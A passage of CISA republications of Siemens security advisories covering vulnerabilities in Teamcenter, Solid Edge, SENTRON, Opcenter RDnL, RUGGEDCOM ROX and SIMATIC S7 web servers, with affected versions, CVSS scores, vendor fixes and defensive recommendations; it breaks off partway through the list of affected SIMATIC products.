View CSAF Summary Siemens Teamcenter is affected by multiple vulnerabilities which could potentially lead to a compromise in availability, integrity and confidentiality. Siemens has released new versions for the affected products and recommends to update to the latest versions. The following versions of Siemens Teamcenter are affected: Teamcenter V2312 vers:intdot/<2312.0014, vers:intdot/<2312.0009 (CVE-2026-33862, CVE-2026-33893, CVE-2024-4367) Teamcenter V2406 vers:intdot/<2406.0012, vers:intdot/<2406.0006 (CVE-2026-33862, CVE-2026-33893, CVE-2024-4367) Teamcenter V2412 vers:intdot/<2412.0009 (CVE-2026-33862, CVE-2026-33893) Teamcenter V2506 vers:intdot/<2506.0005 (CVE-2026-33862, CVE-2026-33893) Teamcenter V2512 vers:all/*  CVSS Vendor Equipment Vulnerabilities v3 7.5 Siemens Siemens Teamcenter Improper Check for Unusual or Exceptional Conditions, Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'), Use of Hard-coded Credentials Background Critical Infrastructure Sectors: Critical Manufacturing Countries/Areas Deployed: Worldwide Company Headquarters Location: Germany Vulnerabilities Expand All + CVE-2024-4367 A type check was missing when handling fonts in PDF.js, which would allow arbitrary JavaScript execution in the PDF.js context. This vulnerability affects Firefox < 126, Firefox ESR < 115.11, and Thunderbird < 115.11. View CVE Details Affected Products Siemens Teamcenter Vendor: Siemens Product Version: Teamcenter V2312, Teamcenter V2406 Product Status: known_affected, known_not_affected Remediations Vendor fix Update to V2312.0009 or later version https://support.sw.siemens.com/product/282219420/ Vendor fix Update to V2406.0006 or later version https://support.sw.siemens.com/product/282219420/ Relevant CWE: CWE-754 Improper Check for Unusual or Exceptional Conditions Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.6 MEDIUM CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L CVE-2026-33862 The affected application does not properly encode or filter user-supplied data. This could allow an attacker to inject malicious code that can be executed by other users when they visit the affected page. View CVE Details Affected Products Siemens Teamcenter Vendor: Siemens Product Version: Teamcenter V2312, Teamcenter V2406, Teamcenter V2412, Teamcenter V2506 Product Status: known_affected, known_not_affected Remediations Vendor fix Update to V2312.0014 or later version https://support.sw.siemens.com/product/282219420/ Vendor fix Update to V2406.0012 or later version https://support.sw.siemens.com/product/282219420/ Vendor fix Update to V2412.0009 or later version https://support.sw.siemens.com/product/282219420/ Vendor fix Update to V2506.0005 or later version https://support.sw.siemens.com/product/282219420/ Relevant CWE: CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.3 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N CVE-2026-33893 The affected application contains hardcoded key which is used for obfuscation stored directly into the application. This could allow an attacker to obtain these keys and misuse them to gain unauthorized access. View CVE Details Affected Products Siemens Teamcenter Vendor: Siemens Product Version: Teamcenter V2312, Teamcenter V2406, Teamcenter V2412, Teamcenter V2506 Product Status: known_affected, known_not_affected Remediations Vendor fix Update to V2312.0014 or later version https://support.sw.siemens.com/product/282219420/ Vendor fix Update to V2406.0012 or later version https://support.sw.siemens.com/product/282219420/ Vendor fix Update to V2412.0009 or later version https://support.sw.siemens.com/product/282219420/ Vendor fix Update to V2506.0005 or later version https://support.sw.siemens.com/product/282219420/ Relevant CWE: CWE-798 Use of Hard-coded Credentials Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N Acknowledgments Dustin Born, Robin Plugge, and Tim Wörner of usd AG reported these vulnerabilities. General Recommendations As a general security measure, Siemens strongly recommends to protect network access to devices with appropriate mechanisms. In order to operate the devices in a protected IT environment, Siemens recommends to configure the environment according to Siemens' operational guidelines for Industrial Security (Download: https://www.siemens.com/cert/operational-guidelines-industrial-security), and to follow the recommendations in the product manuals. Additional information on Industrial Security by Siemens can be found at: https://www.siemens.com/industrialsecurity Additional Resources For further inquiries on security vulnerabilities in Siemens products and solutions, please contact the Siemens ProductCERT: https://www.siemens.com/cert/advisories Terms of Use The use of Siemens Security Advisories is subject to the terms and conditions listed on: https://www.siemens.com/productcert/terms-of-use. Legal Notice and Terms of Use This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy). Recommended Practices CISA recommends users take defensive measures to minimize the exploitation risk of this vulnerability. Minimize network exposure for all control system devices and/or systems, and ensure they are not accessible from the internet. Locate control system networks and remote devices behind firewalls and isolate them from business networks. When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most recent version available. Also recognize VPN is only as secure as its connected devices. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents. Advisory Conversion Disclaimer This ICSA is a verbatim republication of Siemens ProductCERT SSA-827383 from a direct conversion of the vendor's Common Security Advisory Framework (CSAF) advisory. This is republished to CISA's website as a means of increasing visibility and is provided "as-is" for informational purposes only. CISA is not responsible for the editorial or technical accuracy of republished advisories and provides no warranties of any kind regarding any information contained within this advisory. Further, CISA does not endorse any commercial product or service. Please contact Siemens ProductCERT directly for any questions regarding this advisory. Revision History Initial Release Date: 2026-05-12 Date Revision Summary 2026-05-12 1 Publication Date 2026-05-14 2 Initial CISA Republication of Siemens ProductCERT SSA-827383 advisory Legal Notice and Terms of Use

View CSAF Summary Solid Edge SE2026 before Update 5 is affected by two file parsing vulnerabilities that could be triggered when the application reads specially crafted files in PAR format. This could allow an attacker to crash the application or execute arbitrary code. Siemens has released a new version for Solid Edge SE2026 and recommends to update to the latest version. The following versions of Siemens Solid Edge are affected: Solid Edge vers:intdot/<226.0.5  CVSS Vendor Equipment Vulnerabilities v3 7.8 Siemens Siemens Solid Edge Access of Uninitialized Pointer, Stack-based Buffer Overflow Background Critical Infrastructure Sectors: Critical Manufacturing Countries/Areas Deployed: Worldwide Company Headquarters Location: Germany Vulnerabilities Expand All + CVE-2026-44411 The affected application is vulnerable to uninitialized pointer access while parsing specially crafted PAR files. An attacker could leverage this vulnerability to execute code in the context of the current process. View CVE Details Affected Products Siemens Solid Edge Vendor: Siemens Product Version: Solid Edge Product Status: known_affected Remediations Vendor fix Update to V226.0 Update 5 or later version https://support.sw.siemens.com/product/246738425/ Relevant CWE: CWE-824 Access of Uninitialized Pointer Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.8 HIGH CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H CVE-2026-44412 The affected applications contain a stack based overflow vulnerability while parsing specially crafted PAR files. This could allow an attacker to execute code in the context of the current process. View CVE Details Affected Products Siemens Solid Edge Vendor: Siemens Product Version: Solid Edge Product Status: known_affected Remediations Vendor fix Update to V226.0 Update 5 or later version https://support.sw.siemens.com/product/246738425/ Relevant CWE: CWE-121 Stack-based Buffer Overflow Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.8 HIGH CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H Acknowledgments Michael Heinzl reported these vulnerabilities. General Recommendations As a general security measure, Siemens strongly recommends to protect network access to devices with appropriate mechanisms. In order to operate the devices in a protected IT environment, Siemens recommends to configure the environment according to Siemens' operational guidelines for Industrial Security (Download: https://www.siemens.com/cert/operational-guidelines-industrial-security), and to follow the recommendations in the product manuals. Additional information on Industrial Security by Siemens can be found at: https://www.siemens.com/industrialsecurity Additional Resources For further inquiries on security vulnerabilities in Siemens products and solutions, please contact the Siemens ProductCERT: https://www.siemens.com/cert/advisories Terms of Use The use of Siemens Security Advisories is subject to the terms and conditions listed on: https://www.siemens.com/productcert/terms-of-use. Legal Notice and Terms of Use This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy). Recommended Practices CISA recommends users take defensive measures to minimize the exploitation risk of this vulnerability. Minimize network exposure for all control system devices and/or systems, and ensure they are not accessible from the internet. Locate control system networks and remote devices behind firewalls and isolate them from business networks. When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most recent version available. Also recognize VPN is only as secure as its connected devices. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents. Advisory Conversion Disclaimer This ICSA is a verbatim republication of Siemens ProductCERT SSA-921111 from a direct conversion of the vendor's Common Security Advisory Framework (CSAF) advisory. This is republished to CISA's website as a means of increasing visibility and is provided "as-is" for informational purposes only. CISA is not responsible for the editorial or technical accuracy of republished advisories and provides no warranties of any kind regarding any information contained within this advisory. Further, CISA does not endorse any commercial product or service. Please contact Siemens ProductCERT directly for any questions regarding this advisory. Revision History Initial Release Date: 2026-05-12 Date Revision Summary 2026-05-12 1 Publication Date 2026-05-13 2 Fixed error in title with the change from SE225 to SE226 2026-05-14 3 Initial CISA Republication of Siemens ProductCERT SSA-921111 advisory Legal Notice and Terms of Use

View CSAF Summary The web server in SENTRON 7KT PAC1261 Data Manager Before V2.1.0 contains a request smuggling vulnerability in the Go Project's net/http package that could allow an attacker to retrieve authorization tokens that can be used to gain administrative control over the device. Siemens has released a new version for SENTRON 7KT PAC1261 Data Manager and recommends to update to the latest version. The following versions of Siemens SENTRON 7KT PAC1261 Data Manager are affected: SENTRON 7KT PAC1261 Data Manager vers:intdot/<2.1.0  CVSS Vendor Equipment Vulnerabilities v3 9.1 Siemens Siemens SENTRON 7KT PAC1261 Data Manager Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling') Background Critical Infrastructure Sectors: Energy Countries/Areas Deployed: Worldwide Company Headquarters Location: Germany Vulnerabilities Expand All + CVE-2025-22871 The net/http package improperly accepts a bare LF as a line terminator in chunked data chunk-size lines. This can permit request smuggling if a net/http server is used in conjunction with a server that incorrectly accepts a bare LF as part of a chunk-ext. View CVE Details Affected Products Siemens SENTRON 7KT PAC1261 Data Manager Vendor: Siemens Product Version: SENTRON 7KT PAC1261 Data Manager Product Status: known_affected Remediations Mitigation Use encrypted protocols Vendor fix Update to V2.1.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109977717/ Relevant CWE: CWE-444 Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling') Metrics CVSS Version Base Score Base Severity Vector String 3.1 9.1 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N Acknowledgments Siemens ProductCERT reported this vulnerability to CISA. General Recommendations As a general security measure, Siemens strongly recommends to protect network access to devices with appropriate mechanisms. In order to operate the devices in a protected IT environment, Siemens recommends to configure the environment according to Siemens' operational guidelines for Industrial Security (Download: https://www.siemens.com/cert/operational-guidelines-industrial-security), and to follow the recommendations in the product manuals. Additional information on Industrial Security by Siemens can be found at: https://www.siemens.com/industrialsecurity Additional Resources For further inquiries on security vulnerabilities in Siemens products and solutions, please contact the Siemens ProductCERT: https://www.siemens.com/cert/advisories Terms of Use The use of Siemens Security Advisories is subject to the terms and conditions listed on: https://www.siemens.com/productcert/terms-of-use. Legal Notice and Terms of Use This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy). Recommended Practices CISA recommends users take defensive measures to minimize the exploitation risk of these vulnerabilities. Minimize network exposure for all control system devices and/or systems, and ensure they are not accessible from the internet. Locate control system networks and remote devices behind firewalls and isolate them from business networks. When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most recent version available. Also recognize VPN is only as secure as its connected devices. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents. Advisory Conversion Disclaimer This ICSA is a verbatim republication of Siemens ProductCERT SSA-783943 from a direct conversion of the vendor's Common Security Advisory Framework (CSAF) advisory. This is republished to CISA's website as a means of increasing visibility and is provided "as-is" for informational purposes only. CISA is not responsible for the editorial or technical accuracy of republished advisories and provides no warranties of any kind regarding any information contained within this advisory. Further, CISA does not endorse any commercial product or service. Please contact Siemens ProductCERT directly for any questions regarding this advisory. Revision History Initial Release Date: 2026-05-12 Date Revision Summary 2026-05-12 1 Publication Date 2026-05-14 2 Initial CISA Republication of Siemens ProductCERT SSA-783943 advisory Legal Notice and Terms of Use

View CSAF Summary Opcenter RDnL is affected by missing authentication in critical function in ‘ActiveMQ Artemis’. An unauthenticated attacker within the adjacent network could use the Core protocol to force a target broker to establish an outbound Core federation connection to an attacker-controlled rogue broker. This could potentially result in availability impacts or message injection into any queue via the rogue broker. Breaking the integrity of a message has a low impact due to missing auto refresh functionality and it does not contain any confidential information. ActiveMQ Artemis has released a new version and Siemens recommends to update to the latest version. The following versions of Siemens Opcenter RDnL are affected: Opcenter RDnL vers:all/* CVSS Vendor Equipment Vulnerabilities v3 7.1 Siemens Siemens Opcenter RDnL Missing Authentication for Critical Function Background Critical Infrastructure Sectors: Critical Manufacturing Countries/Areas Deployed: Worldwide Company Headquarters Location: Germany Vulnerabilities Expand All + CVE-2026-27446 Missing Authentication for Critical Function (CWE-306) vulnerability in Apache Artemis, Apache ActiveMQ Artemis. An unauthenticated remote attacker can use the Core protocol to force a target broker to establish an outbound Core federation connection to an attacker-controlled rogue broker. This could potentially result in message injection into any queue and/or message exfiltration from any queue via the rogue broker. This impacts environments that allow both: - incoming Core protocol connections from untrusted sources to the broker - outgoing Core protocol connections from the broker to untrusted targets View CVE Details Affected Products Siemens Opcenter RDnL Vendor: Siemens Product Version: Opcenter RDnL Product Status: known_affected Remediations Mitigation Implement and deploy a Core interceptor to deny all Core downstream federation connect packets. Such packets have a type of (int) -16 or (byte) 0xfffffff0. Documentation for interceptors is available at  https://artemis.apache.org/components/artemis/documentation/latest/intercepting-operations.html . Mitigation Remove Core protocol support from any acceptor receiving connections from untrusted sources. Incoming Core protocol connections are supported by default via the "artemis" acceptor listening on port 61616. See the "protocols" URL parameter configured for the acceptor. An acceptor URL without this parameter supports all protocols by default, including Core Mitigation Use two-way SSL (i.e. certificate-based authentication) in order to force every client to present the proper SSL certificate when establishing a connection before any message protocol handshake is attempted. This will prevent unauthenticated exploitation of this vulnerability Vendor fix Update to Apache Artemis version 2.52.0 or later version Relevant CWE: CWE-306 Missing Authentication for Critical Function Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.1 HIGH CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H Acknowledgments Siemens ProductCERT reported this vulnerability to CISA. General Recommendations As a general security measure, Siemens strongly recommends to protect network access to devices with appropriate mechanisms. In order to operate the devices in a protected IT environment, Siemens recommends to configure the environment according to Siemens' operational guidelines for Industrial Security (Download: https://www.siemens.com/cert/operational-guidelines-industrial-security), and to follow the recommendations in the product manuals. Additional information on Industrial Security by Siemens can be found at: https://www.siemens.com/industrialsecurity Additional Resources For further inquiries on security vulnerabilities in Siemens products and solutions, please contact the Siemens ProductCERT: https://www.siemens.com/cert/advisories Terms of Use The use of Siemens Security Advisories is subject to the terms and conditions listed on: https://www.siemens.com/productcert/terms-of-use. Legal Notice and Terms of Use This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy). Recommended Practices CISA recommends users take defensive measures to minimize the exploitation risk of these vulnerabilities. Minimize network exposure for all control system devices and/or systems, and ensure they are not accessible from the internet. Locate control system networks and remote devices behind firewalls and isolate them from business networks. When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most recent version available. Also recognize VPN is only as secure as its connected devices. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents. Advisory Conversion Disclaimer This ICSA is a verbatim republication of Siemens ProductCERT SSA-085541 from a direct conversion of the vendor's Common Security Advisory Framework (CSAF) advisory. This is republished to CISA's website as a means of increasing visibility and is provided "as-is" for informational purposes only. CISA is not responsible for the editorial or technical accuracy of republished advisories and provides no warranties of any kind regarding any information contained within this advisory. Further, CISA does not endorse any commercial product or service. Please contact Siemens ProductCERT directly for any questions regarding this advisory. Revision History Initial Release Date: 2026-05-12 Date Revision Summary 2026-05-12 1 Publication Date 2026-05-14 2 Initial CISA Republication of Siemens ProductCERT SSA-085541 advisory Legal Notice and Terms of Use

View CSAF Summary Ruggedcom Rox contains an improper access control vulnerability that could allow an authenticated remote attacker to read arbitrary files with root privileges from the underlying operating system's filesystem. Siemens has released new versions for the affected products and recommends to update to the latest versions. The following versions of Siemens Ruggedcom Rox are affected: RUGGEDCOM ROX MX5000 vers:intdot/<2.17.1 RUGGEDCOM ROX MX5000RE vers:intdot/<2.17.1  RUGGEDCOM ROX RX1400 vers:intdot/<2.17.1  RUGGEDCOM ROX RX1500 vers:intdot/<2.17.1  RUGGEDCOM ROX RX1501 vers:intdot/<2.17.1 RUGGEDCOM ROX RX1510 vers:intdot/<2.17.1  RUGGEDCOM ROX RX1511 vers:intdot/<2.17.1  RUGGEDCOM ROX RX1512 vers:intdot/<2.17.1  RUGGEDCOM ROX RX1524 vers:intdot/<2.17.1  RUGGEDCOM ROX RX1536 vers:intdot/<2.17.1  RUGGEDCOM ROX RX5000 vers:intdot/<2.17.1 CVSS Vendor Equipment Vulnerabilities v3 6.8 Siemens Siemens Ruggedcom Rox Improper Neutralization of Argument Delimiters in a Command ('Argument Injection') Background Critical Infrastructure Sectors: Critical Manufacturing Countries/Areas Deployed: Worldwide Company Headquarters Location: Germany Vulnerabilities Expand All + CVE-2025-40948 Affected devices do not properly validate input in the web server's JSON-RPC interface. This could allow an authenticated remote attacker to read arbitrary files from the underlying operating system's filesystem with root privileges. View CVE Details Affected Products Siemens Ruggedcom Rox Vendor: Siemens Product Version: RUGGEDCOM ROX MX5000, RUGGEDCOM ROX MX5000RE, RUGGEDCOM ROX RX1400, RUGGEDCOM ROX RX1500, RUGGEDCOM ROX RX1501, RUGGEDCOM ROX RX1510, RUGGEDCOM ROX RX1511, RUGGEDCOM ROX RX1512, RUGGEDCOM ROX RX1524, RUGGEDCOM ROX RX1536, RUGGEDCOM ROX RX5000 Product Status: known_affected Remediations Vendor fix Update to V2.17.1 or later version https://support.industry.siemens.com/cs/ww/en/view/110002017/ Relevant CWE: CWE-88 Improper Neutralization of Argument Delimiters in a Command ('Argument Injection') Metrics CVSS Version Base Score Base Severity Vector String 3.1 6.8 MEDIUM CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N Acknowledgments Emmanuel Zhou, Rick Wyble, Mehemt Balta, and Adam Robbie of Palo Alto Networks OT Threat Research Lab reported this vulnerability. General Recommendations As a general security measure, Siemens strongly recommends to protect network access to devices with appropriate mechanisms. In order to operate the devices in a protected IT environment, Siemens recommends to configure the environment according to Siemens' operational guidelines for Industrial Security (Download: https://www.siemens.com/cert/operational-guidelines-industrial-security), and to follow the recommendations in the product manuals. Additional information on Industrial Security by Siemens can be found at: https://www.siemens.com/industrialsecurity Additional Resources For further inquiries on security vulnerabilities in Siemens products and solutions, please contact the Siemens ProductCERT: https://www.siemens.com/cert/advisories Terms of Use The use of Siemens Security Advisories is subject to the terms and conditions listed on: https://www.siemens.com/productcert/terms-of-use. Legal Notice and Terms of Use This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy). Recommended Practices CISA recommends users take defensive measures to minimize the exploitation risk of these vulnerabilities. Minimize network exposure for all control system devices and/or systems, and ensure they are not accessible from the internet. Locate control system networks and remote devices behind firewalls and isolate them from business networks. When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most recent version available. Also recognize VPN is only as secure as its connected devices. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents. Advisory Conversion Disclaimer This ICSA is a verbatim republication of Siemens ProductCERT SSA-973901 from a direct conversion of the vendor's Common Security Advisory Framework (CSAF) advisory. This is republished to CISA's website as a means of increasing visibility and is provided "as-is" for informational purposes only. CISA is not responsible for the editorial or technical accuracy of republished advisories and provides no warranties of any kind regarding any information contained within this advisory. Further, CISA does not endorse any commercial product or service. Please contact Siemens ProductCERT directly for any questions regarding this advisory. Revision History Initial Release Date: 2026-05-12 Date Revision Summary 2026-05-12 1 Publication Date 2026-05-14 2 Initial CISA Republication of Siemens ProductCERT SSA-973901 advisory Legal Notice and Terms of Use

View CSAF Summary SIMATIC S7 PLCs contain multiple vulnerabilities in the web server that could allow an attacker to perform cross-site scripting attacks. Siemens has released new versions for several affected products and recommends to update to the latest versions. Siemens is preparing further fix versions and recommends specific countermeasures for products where fixes are not, or not yet available. The following versions of Siemens SIMATIC S7 PLC Web Server are affected: SIMATIC Drive Controller CPU 1504D TF (6ES7615-4DF10-0AB0) vers:intdot/<3.1.6 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC Drive Controller CPU 1507D TF (6ES7615-7DF10-0AB0) vers:intdot/<3.1.6 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC ET 200SP CPU 1510SP F-1 PN (6ES7510-1SJ00-0AB0) vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC ET 200SP CPU 1510SP F-1 PN (6ES7510-1SJ01-0AB0) vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC ET 200SP CPU 1510SP F-1 PN (6ES7510-1SK03-0AB0) vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC ET 200SP CPU 1510SP-1 PN (6ES7510-1DJ00-0AB0) vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC ET 200SP CPU 1510SP-1 PN (6ES7510-1DJ01-0AB0) vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC ET 200SP CPU 1510SP-1 PN (6ES7510-1DK03-0AB0) vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC ET 200SP CPU 1512SP F-1 PN (6ES7512-1SK00-0AB0) vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC ET 200SP CPU 1512SP F-1 PN (6ES7512-1SK01-0AB0) vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC ET 200SP CPU 1512SP F-1 PN (6ES7512-1SM03-0AB0) vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC ET 200SP CPU 1512SP-1 PN (6ES7512-1DK00-0AB0) vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC ET 200SP CPU 1512SP-1 PN (6ES7512-1DK01-0AB0) vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC ET 200SP CPU 1512SP-1 PN (6ES7512-1DM03-0AB0) vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC ET 200SP CPU 1514SP F-2 PN (6ES7514-2SN03-0AB0) vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC ET 200SP CPU 1514SP-2 PN (6ES7514-2DN03-0AB0) vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC ET 200SP CPU 1514SPT F-2 PN (6ES7514-2WN03-0AB0) vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC ET 200SP CPU 1514SPT-2 PN (6ES7514-2VN03-0AB0) vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC ET 200SP Open Controller CPU 1515SP PC (incl. SIPLUS variants) vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC ET 200SP Open Controller CPU 1515SP PC2 (incl. SIPLUS variants) V2 CPUs vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC ET 200SP Open Controller CPU 1515SP PC2 (incl. SIPLUS variants) V3 CPUs vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC ET 200SP Open Controller CPU 1515SP PC3 V4 CPUs vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AK00-0AB0) vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AK01-0AB0) vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AK02-0AB0) vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AL03-0AB0) vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 CPU 1511C-1 PN (6ES7511-1CK00-0AB0) vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 CPU 1511C-1 PN (6ES7511-1CK01-0AB0) vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 CPU 1511C-1 PN (6ES7511-1CL03-0AB0) vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 CPU 1511F-1 PN (6ES7511-1FK00-0AB0) vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 CPU 1511F-1 PN (6ES7511-1FK01-0AB0) vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 CPU 1511F-1 PN (6ES7511-1FK02-0AB0) vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 CPU 1511F-1 PN (6ES7511-1FL03-0AB0) vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 CPU 1511T-1 PN (6ES7511-1TK01-0AB0) vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 CPU 1511T-1 PN (6ES7511-1TL03-0AB0) vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 CPU 1511TF-1 PN (6ES7511-1UK01-0AB0) vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 CPU 1511TF-1 PN (6ES7511-1UL03-0AB0) vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 CPU 1512C-1 PN (6ES7512-1CK00-0AB0) vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 CPU 1512C-1 PN (6ES7512-1CK01-0AB0) vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 CPU 1512C-1 PN (6ES7512-1CM03-0AB0) vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 CPU 1513-1 PN (6ES7513-1AL00-0AB0) vers:all/* 